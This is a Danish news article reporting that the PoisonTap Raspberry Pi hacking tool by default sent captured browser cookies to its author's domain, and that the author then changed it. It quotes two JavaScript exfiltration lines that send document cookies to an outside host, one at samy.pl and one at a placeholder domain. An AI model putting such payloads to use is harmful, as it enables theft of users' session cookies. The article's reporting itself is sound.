Kildekode-svipser i Raspberry PI-hackerværktøj: Sendte bruger-cookies til ophavsmandens domæne

Et hyppigt brugt argument for åben kildekode frem for lukket er, at enhver i princippet har mulighed for at kigge med i den åbne kode og byde ind med rettelser eller bare tjekke, om alt ser ud til at være i orden. Spørgsmålet er så, om det sker?

Til tider.

Reddit-brugeren d4nk1st har i hvert fald benyttet sig af muligheden for at kigge i koden til til PoisonTap, som er et stykke ny-offentliggjort hacker-software, der kan køre på en Raspberry Pi Zero.

Softwaren får en computer til at tro, at Raspberry Pi'en er et netværksinterface.

Det viser sig at være en sikkerhedsmæssig katastrofe, hvor en ellers låst og tækkelig pc plaprer hemmeligheder videre til den tilsluttede Raspberry Pi. Sidstnævnte kan fjernstyres af en hacker.

Superhacker

Det er superhackeren Samy Kamkar, som står bag PoinsonTap. Det med super er ikke bare for, at det skal lyde smart. Kamkar har adskillige bemærkelsesværdige hacker-projekter bag sig.

Blandt andet har han under projektet SkyJack begået en drone, der via en Raspberry Pi kunne overtage andre droner.

Og så var der projektet MagSpoof, en enhed der kan emulere et vilkårligt magnet-kort.

Det inspirerede et andet projekt, som Version2 omtalte tidligere i år, om som gør det muligt at brute-force ellers låste hoteldøre åbne, hvis nøglen til døren er et magnetkort.

Flere af Kamkars projekter har - ikke overraskende - fået en del medieomtale.

PoisonTap er i den forbindelse ingen undtagelse. Som blandt andet Version2 tidligere i dag har fortalt, gør softwaren det muligt blandt andet at hijacke internettrafik fra offerets maskine, ligesom PoisonTap kan opsnappe HTTP-cookies fra maskinens webbrowser.

Løjerlig kodestump

Det er netop i forhold til cookie-opsnapningen, at d4nk1st er faldet over noget løjerligt i den oprindelige PoisonTap-kode.

Sponseret indhold

Microsoft rykker forretningssoftware op i ny liga med AI – og det sker fra Lyngby

AI

En kodestump i en del af værktøjet har nemlig som standard være sat op til at sende opsamlede cookies til Samy Kamkars eget domæne.

Det vil med ifølge d4nk1st sige, at hvis pen-testere, hackere og nysgerrige brugere har hentet kildekoden for så at begynde at teste, ja, så kan eventuelt opsamlede cookies i udgangspunktet være blevet sendt videre til Kamkars domæne.

Den pågældende kodelinje, som d4nk1st har bemærket, så oprindeligt således ud:

new Image().src='http://samy.pl/poisontap/log.php?log='+document.cookies;

Reddit brugeren kalder spøgefuldt projektet for en honeypot - altså et sikkerhedsværktøj bevidst lavet til at tiltrække og studere malware og cyberkriminalitet.

»For at være alvorlig. Jeg håber ikke nogen af jer har forsøgt at teste dette, uden at have opsat jeres egen websocket-server og jeres egen logger i stedet for bare at installere og lave en testkørsel, som giver ham (Samy Kamkar, red.) jeres cookies og alt,« skriver d4nk1st i et indlæg om PoisonTap på Reddit-undersiden /r/netsec/

Til det svarer - hvad der efter tidligere Reddit-indlæg at dømme er - Samy Kamkar selv:

»Oops, jeg har opdateret dette, så det ikke peger på mig længere,« svarer hackeren, der ikke modsiger d4nk1st påstand om, at kodestumpen i udgangspunktet har sendt brugeres cookies mod Kamkars domæne.

Kamkars svar er i skrivende stund 15 timer gammelt, og et kig i GitHub-koden viser en rettelse, så cookie-opsamlingsdelen som standard ikke længere peger på Kamkars eget domæne.

Sponseret indhold

Stop med at spørge om NIS2 gælder for dig – men spørg hellere, hvordan du kommer i gang med ISO 27001

ISO 27001

Nu indeholder koden en klar opfordring til at indsætte sit eget domæne.

new Image().src='http://YOUR.DOMAIN/poisontap/log.php?log='+document.cookies;